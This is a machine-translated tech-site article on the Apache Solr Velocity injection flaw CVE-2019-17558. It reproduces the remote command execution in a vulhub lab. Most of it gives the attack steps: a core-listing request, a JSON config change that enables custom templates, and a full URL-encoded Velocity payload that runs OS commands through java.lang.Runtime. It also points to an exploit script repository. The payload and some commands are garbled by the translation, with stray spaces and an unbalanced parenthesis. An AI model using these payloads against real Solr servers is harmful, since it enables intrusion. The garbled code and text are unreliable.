Shulou(Shulou.com)05/31 Report--

Apache Solr Velocity injection remote command execution vulnerability CVE-2019-17558 how to analyze, I believe that many inexperienced people do not know what to do, so this paper summarizes the causes of the problem and solutions, through this article I hope you can solve this problem.

Introduction to 0x00

Solr is an open source enterprise search server, and the underlying layer is implemented using Java that is easy to extend and modify. Server communication uses standard HTTP and XML, so it is useful but not necessary to understand Java technology using Solr.

The main features of Solr are: powerful full-text retrieval function, highlighting search results, dynamic cluster, database interface and electronic document (Word, PDF, etc.) processing. And Solr is highly extensible, supporting replication of distributed searches and indexes.

Overview of 0x01 vulnerabilities

An input validation error vulnerability exists in Apache Solr versions 5.0.0 to 8.3.1. An attacker can use the Velocity template to exploit this vulnerability to execute arbitrary code on the system.

0x02 affects version

Apache Solr 5.0.0 ~ 8.3.1

0x03 environment building

1. Vulhub is used to build this environment. Download address:

Git clone c https://github.com/vulhub/vulhub.git

2. Download to a virtual machine with docker environment, and enter the directory to pull docker.

Cd vulhub-master/solr/CVE-2019-17558 /

Docker-compose up-d

3. See that the green "done" is pulled successfully and access http://your-ip:8983 in the browser.

Recurrence of 0x04 vulnerabilities

1. Params.resource.loader.enabled configuration is not open by default, and custom templates cannot be used. You can first get all the cores through the following API / / in vulhub, the core is demo

Http://your-ip:8983/solr/admin/cores?indexInfo=false&wt=json

2. Enable the configuration params.resource.loader.enabled, use Burp to grab the package in url access / solr/demo/config and change it to POST, and then modify the startup configuration / / and then change Content-Type to application/json.

{

"update-queryresponsewriter": {

"startup": "lazy"

"name": "velocity"

"class": "solr.VelocityResponseWriter"

"template.base.dir":

"solr.resource.loader.enabled": "true"

"params.resource.loader.enabled": "true"

}

}

3. Then any command can be executed through the Velocity template, as follows:

Http://your-ip:8983/solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor () +% 23set ($out=$ex.getInputStream ()) +% 23foreach ($str.valueOf + [1..$out.available ()]) $str.valueOf ($chr.toChars ($out.read ()% 23end

4. Use python script to exploit the vulnerability. Run it with python3. Download the script from: / / Note: many of these scripts on GitHub can be searched on their own.

Https://github.com/zhzyker/exphub

0x05 repair recommendation

1. It is recommended to upgrade Appache Salc to the latest version

After reading the above, have you mastered how to analyze the Apache Solr Velocity injection remote command execution vulnerability CVE-2019-17558? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.